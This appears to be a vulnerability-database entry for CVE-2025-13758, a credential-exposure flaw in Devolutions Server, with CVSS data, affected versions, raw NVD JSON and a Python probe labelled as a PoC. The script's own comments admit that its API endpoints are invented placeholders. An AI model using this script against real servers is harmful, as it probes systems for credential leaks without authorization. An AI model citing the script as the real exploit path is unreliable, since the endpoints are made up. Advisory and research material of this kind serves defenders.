Security Vulnerability Report
CVE-2025-13758 CVSS 3.5 LOW

CVE-2025-13758

Published: 2025-11-27 16:15:47
Last Modified: 2025-12-03 14:46:34

Description

Exposure of credentials in unintended requests in Devolutions Server. This issue affects Server: through 2025.2.20, and through 2025.3.8 (see the NVD match ranges under Configurations below for the exact bounds).

CVSS Details

CVSS Score
3.5
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N (network-reachable, low attack complexity, requires a low-privileged account and a user-interaction step; low confidentiality impact, no integrity or availability impact, scope unchanged)

Configurations (Affected Products)

cpe:2.3:a:devolutions:devolutions_server:*:*:*:*:*:*:*:* - VULNERABLE (versionEndExcluding 2025.2.21.0)
cpe:2.3:a:devolutions:devolutions_server:*:*:*:*:*:*:*:* - VULNERABLE (versionStartIncluding 2025.3.2.0, versionEndExcluding 2025.3.10.0)
Devolutions Server <= 2025.2.20 (NVD match data: every build below 2025.2.21.0)
Devolutions Server <= 2025.3.8 (NVD match data: 2025.3.2.0 ≤ version < 2025.3.10.0 — the description's "through 2025.3.8" and the CPE upper bound do not line up exactly; confirm the first fixed build against vendor advisory DEVO-2025-0018)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. It is a generic probe, not a verified exploit: the API paths it requests are not taken from the vendor advisory or the NVD record, and the vector's PR:L/UI:R means a low-privileged account plus a user-interaction step are required, which the script does not reproduce — a negative result does not show that the target is patched.
python
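# CVE-2025-13758 PoC - Devolutions Server Credential Exposure
#
# Generic probe for the credential-exposure issue tracked as CVE-2025-13758
# (CWE-200 / CWE-522, vendor advisory DEVO-2025-0018).
#
# NOTE(review): none of the API paths used below (/api/session/establish,
# /api/resources/list, /api/users/profile, /api/connections/history,
# /api/vulnerability/check) come from the vendor advisory or the NVD record,
# and they have not been confirmed against a real Devolutions Server.  Treat
# them as placeholders to be replaced with endpoints verified in a lab.  The
# NVD vector (PR:L, UI:R, C:L) also calls for a low-privileged account *and* a
# user-interaction step that this script does not reproduce, so a negative
# result from it proves nothing about the target.
#
# For educational and authorized testing purposes only.
import os
import sys
import requests
import json  # noqa: F401 -- kept from the original listing, currently unused
import time  # noqa: F401 -- kept from the original listing, currently unused

# Base URL of the instance under test (override with DEVO_TARGET_URL).
TARGET_URL = os.environ.get("DEVO_TARGET_URL", "https://target-server.com")
# Bearer token of the low-privileged test account.  Read from the environment
# so a real token is never hard-coded in a script that tends to get committed.
ATTACKER_TOKEN = os.environ.get("DEVO_TOKEN", "attacker_low_privilege_token")
# Hard per-request timeout (seconds); without one a stalled server hangs the run.
REQUEST_TIMEOUT = 10
# Substrings that flag a response body for manual review.  A match is NOT proof
# of leakage: schema field names and messages such as "invalid credentials"
# match as well.
CREDENTIAL_MARKERS = ("password", "credential")
# Affected ranges as published in the NVD configuration for this CVE:
# every build below 2025.2.21.0, and 2025.3.2.0 <= v < 2025.3.10.0.
# Each entry is (start_inclusive_or_None, end_exclusive).
AFFECTED_RANGES = (
    (None, (2025, 2, 21, 0)),
    ((2025, 3, 2, 0), (2025, 3, 10, 0)),
)


def _parse_version(version):
    """Turn a dotted version string such as "2025.3.8" into a tuple of ints.

    Missing trailing components are padded with zeros so "2025.3.8" compares
    equal to "2025.3.8.0".  Raises ValueError on an empty string or a
    non-numeric component.
    """
    parts = [int(p) for p in version.strip().split(".") if p != ""]
    if not parts:
        raise ValueError(f"empty version string: {version!r}")
    while len(parts) < 4:
        parts.append(0)
    return tuple(parts)


def is_affected_version(version):
    """Return True if *version* falls inside an NVD-listed affected range."""
    parsed = _parse_version(version)
    for start, end_excl in AFFECTED_RANGES:
        if (start is None or parsed >= start) and parsed < end_excl:
            return True
    return False


def _build_headers(token):
    """Return the headers shared by the probe requests made by this script."""
    return {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0 (compatible; Security-Scanner/1.0)",
    }


def _find_markers(text, markers=CREDENTIAL_MARKERS):
    """Return the markers present in *text* (case-insensitive), in marker order."""
    lowered = text.lower()
    return [marker for marker in markers if marker in lowered]


def exploit_credential_exposure(target_url=TARGET_URL, token=ATTACKER_TOKEN,
                                timeout=REQUEST_TIMEOUT):
    """Probe a fixed set of authenticated endpoints for credential-like content.

    Parameters:
        target_url: base URL of the server, without a trailing slash.
        token: bearer token of the low-privileged account used for the probe.
        timeout: per-request timeout in seconds.

    Returns a list with one dict per endpoint whose body contained a marker:
    ``{"url", "status", "markers", "response_preview"}``, where
    ``response_preview`` is the first 500 characters of the body.  An empty
    list means none of the probed bodies matched -- not that the server is
    patched (see the module header).

    Raises requests.RequestException on connection or timeout failures.  TLS
    verification is left at the requests default and must not be disabled.
    """
    headers = _build_headers(token)

    # Step 1: establish a session as the low-privileged account.  A failure is
    # not fatal -- the path is a placeholder and may simply 404 -- but a
    # non-2xx answer is surfaced because the probes below then run without the
    # session the exposure is meant to depend on.
    session_response = requests.post(
        f"{target_url}/api/session/establish",
        headers=headers,
        json={"username": "attacker_account", "domain": "local"},
        timeout=timeout,
    )
    if not session_response.ok:
        print(
            f"[!] session establish returned HTTP {session_response.status_code}; "
            "probe results are unreliable",
            file=sys.stderr,
        )

    # Step 2: read a few endpoints with the same token.  These are plain
    # sequential GETs; despite the original "race condition" wording nothing
    # here is concurrent, so a timing-dependent leak would not be exercised.
    probe_urls = [
        f"{target_url}/api/resources/list",
        f"{target_url}/api/users/profile",
        f"{target_url}/api/connections/history",
    ]

    findings = []
    for url in probe_urls:
        response = requests.get(url, headers=headers, timeout=timeout)
        markers = _find_markers(response.text)
        if markers:
            findings.append({
                "url": url,
                "status": response.status_code,
                "markers": markers,
                "response_preview": response.text[:500],
            })
    return findings


def verify_vulnerability(target_url=TARGET_URL, token=ATTACKER_TOKEN,
                         timeout=REQUEST_TIMEOUT, version=None):
    """Decide whether the target is worth probing.

    If *version* (e.g. "2025.3.8") is given, the answer comes from the NVD
    affected ranges and no request is sent.  Otherwise the original heuristic
    is kept: a GET to ``/api/vulnerability/check`` must return HTTP 200 with
    "credential" in the body.  That endpoint and the ``X-CVE-Id`` header are
    placeholders with no basis in the advisory, so prefer the version path
    whenever the build number is known.

    Raises requests.RequestException on network failure and ValueError on a
    malformed *version*.
    """
    if version is not None:
        return is_affected_version(version)

    headers = {
        "X-CVE-Id": "CVE-2025-13758",
        "Authorization": f"Bearer {token}",
    }
    response = requests.get(
        f"{target_url}/api/vulnerability/check", headers=headers, timeout=timeout
    )
    return response.status_code == 200 and "credential" in response.text.lower()


def main():
    """Run the vulnerability check, then the probes, and print a summary.

    Environment: DEVO_SERVER_VERSION selects the offline version check;
    DEVO_SHOW_PREVIEW=1 prints response previews, which may contain the very
    secrets being looked for and are therefore kept out of terminal
    scrollback and CI logs by default.  Exits 2 on a network failure.
    """
    print("CVE-2025-13758 - Devolutions Server Credential Exposure")
    print("=" * 60)
    show_preview = os.environ.get("DEVO_SHOW_PREVIEW") == "1"
    known_version = os.environ.get("DEVO_SERVER_VERSION")
    try:
        if not verify_vulnerability(version=known_version):
            print("[-] Target does not appear to be vulnerable")
            return
        print("[+] Target is potentially vulnerable")
        credentials = exploit_credential_exposure()
    except requests.RequestException as exc:
        print(f"[x] Request failed: {exc}", file=sys.stderr)
        sys.exit(2)

    if credentials:
        print(f"[!] Found {len(credentials)} potential credential exposures")
        for cred in credentials:
            print(f"URL: {cred['url']}")
            print(f"Status: {cred['status']}  Markers: {', '.join(cred['markers'])}")
            if show_preview:
                print(f"Preview: {cred['response_preview']}")
    else:
        print("[-] No credentials exposed in this test")


if __name__ == "__main__":
    main()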

References

https://devolutions.net/security/advisories/DEVO-2025-0018/ (Vendor Advisory)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13758", "sourceIdentifier": "[email protected]", "published": "2025-11-27T16:15:47.257", "lastModified": "2025-12-03T14:46:33.983", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of credentials in unintended requests in Devolutions Server.This issue affects Server: through 2025.2.20, through 2025.3.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-522"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:devolutions:devolutions_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025.2.21.0", "matchCriteriaId": "FE34C172-0DA3-4FDB-A94B-DF84E36EBAD6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:devolutions:devolutions_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "2025.3.2.0", 
"versionEndExcluding": "2025.3.10.0", "matchCriteriaId": "A41D04CB-BDA3-4E90-8CBD-07E6E806F10C"}]}]}], "references": [{"url": "https://devolutions.net/security/advisories/DEVO-2025-0018/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}